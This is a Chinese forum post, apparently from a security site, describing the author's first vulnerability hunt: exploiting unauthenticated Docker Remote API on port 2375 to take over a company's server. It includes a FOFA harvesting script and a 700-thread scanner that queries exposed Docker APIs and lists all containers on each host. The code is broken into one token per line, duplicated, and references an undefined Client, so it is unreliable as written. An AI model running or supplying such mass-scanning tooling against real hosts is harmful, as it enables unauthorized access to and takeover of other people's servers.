Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。 Docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展,由docker官方提供。
Docker Remote API 是一个取代远程命令行界面(rcli)的REST API。Docker Remote API如配置不当可导致未授权访问,攻击者利用 docker client 或者 http 直接请求就可以访问这个 API,可能导致敏感信息泄露,黑客也可以删除Docker上的数据。 攻击者可进一步利用Docker自身特性,直接访问宿主机上的敏感信息,或对敏感文件进行修改,最终完全控制服务器。
第一次挖洞,前天靠这个漏洞拿下了南京某大公司的一台服务器已获得cnvd编号,就写这篇文章记录分享下
本文仅供学习参考,如若保存下载后请在12小时内删除,不然后果自负。不得传播,商用以及利用文中技术进行非法活动,否则后果自负。严禁转载,否则一切后果自负。
<!--more-->
直接fofa搜docker 协议 端口 2375的资产全爬下来 然后用脚本检测
可以发现2375端口开启,并且是不需要授权访问的
前提:靶机服务器需要能执行docker run指令
至此已经可以控制宿主机了,但是关于反弹shell以及写入自己的ssh密钥这个不一定可以直接操作,由于风险原因我不会进行反弹shell和ssh密钥写入,方法如下
如果上面的逃逸办法用不了,服务器上有用docker挂载web服务可以尝试进入容器上webshell变相拿下
import
requests
import
base64
import
sys
email
=
r
'xxx@qq.com'
api_key
=
r
'fofa_api_key'
api
=
r
'https://fofa.info/api/v1/search/all?email={}&key={}&qbase64={}&size=10000'
arg
=
sys.argv[
1
]
print
(arg)
flag
=
base64.b64encode(arg.encode()).decode()
response
=
requests.get(api.
format
(email,api_key,flag))
results
=
response.json()[
"results"
]
print
(
"共搜索到{}条记录!"
.
format
(
len
(results)))
file_name
=
r
"{}.txt"
.
format
(arg)
f
=
open
(file_name,
"a"
)
for
addr
in
results:
f.write(addr[
0
]
+
'\n'
)
f.close()
import
requests
import
base64
import
sys
email
=
r
'xxx@qq.com'
api_key
=
r
'fofa_api_key'
api
=
r
'https://fofa.info/api/v1/search/all?email={}&key={}&qbase64={}&size=10000'
arg
=
sys.argv[
1
]
print
(arg)
flag
=
base64.b64encode(arg.encode()).decode()
response
=
requests.get(api.
format
(email,api_key,flag))
results
=
response.json()[
"results"
]
print
(
"共搜索到{}条记录!"
.
format
(
len
(results)))
file_name
=
r
"{}.txt"
.
format
(arg)
f
=
open
(file_name,
"a"
)
for
addr
in
results:
f.write(addr[
0
]
+
'\n'
)
f.close()
import
queue
import
threading
import
time
import
requests
import
json
import
docker
thread_lock
=
threading.Lock()
out_result
=
[]
multi
=
700
queueSize
=
800
input_file_path
=
"./port=2375.txt"
output_file_path
=
'./result.txt'
ports
=
[
'2375'
]
wait_time
=
5
def
read_file():
with
open
(input_file_path,
'r'
) as fp:
file_data
=
fp.readlines()
data_list
=
file_data
data_length
=
len
(data_list)
flag_xy
=
0
while
flag_xy !
=
data_length:
while
(
not
workQueue.full())
and
(flag_xy !
=
data_length):
workQueue.put(data_list[flag_xy])
flag_xy
+
=
1
continue
print
(
"文件内容放入队列完成"
)
def
multi_start_main():
while
not
workQueue.empty():
file_line_api
=
workQueue.get()
custom_def(file_line_api)
def
http_get(url):
response
=
requests.get(url)
return
response.text
def
get_version(host, port):
url
=
"http://"
+
host
+
":"
+
port
+
"/version"
ret
=
json.loads(http_get(url))
client_api_version
=
ret[
'ApiVersion'
]
return
client_api_version
def
get_container(host, port, docker_version):
cli
=
Client(base_url
=
'tcp://'
+
host
+
':'
+
port, version
=
docker_version)
return
cli
def
custom_def(file_line_api):
ip
=
file_line_api.strip()
result
=
''
for
port
in
ports:
try
:
docker_version
=
get_version(ip, port)
result
=
ip
+
'\t'
+
port
+
'\tversion:'
+
docker_version
docker_containers
=
get_container(ip, port, docker_version)
result
+
=
'\t'
+
str
(docker_containers.containers(
all
=
True
))
except
Exception as e:
print
(ip, e)
if
result:
print
(
'success:'
, result)
with thread_lock:
out_result.append(result)
break
if
__name__
=
=
'__main__'
:
threads
=
[]
workQueue
=
queue.Queue(queueSize)
fileThread
=
threading.Thread(target
=
read_file)
fileThread.start()
print
(
"文件读取线程准备时间%ss"
%
wait_time)
time.sleep(wait_time)
for
i
in
range
(multi
+
1
):
thread
=
threading.Thread(target
=
multi_start_main)
thread.start()
threads.append(thread)
for
t
in
threads:
t.join()
fileThread.join()
with
open
(output_file_path,
'w'
) as fw:
fw.writelines(out_result)
print
(
"主线程结束,任务完成"
)
import
queue
import
threading
import
time
import
requests
import
json
import
docker
thread_lock
=
threading.Lock()
out_result
=
[]
multi
=
700
queueSize
=
800
input_file_path
=
"./port=2375.txt"
output_file_path
=
'./result.txt'
ports
=
[
'2375'
]
wait_time
=
5
def
read_file():
with
open
(input_file_path,
'r'
) as fp:
file_data
=
fp.readlines()
data_list
=
file_data
data_length
=
len
(data_list)
flag_xy
=
0
while
flag_xy !
=
data_length:
while
(
not
workQueue.full())
and
(flag_xy !
=
data_length):
workQueue.put(data_list[flag_xy])
flag_xy
+
=
1
continue
print
(
"文件内容放入队列完成"
)
def
multi_start_main():
while
not
workQueue.empty():
file_line_api
=
workQueue.get()
custom_def(file_line_api)
def
http_get(url):
response
=
requests.get(url)
return
response.text
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
最后于 2022-3-27 18:53
被H.R.P编辑
,原因: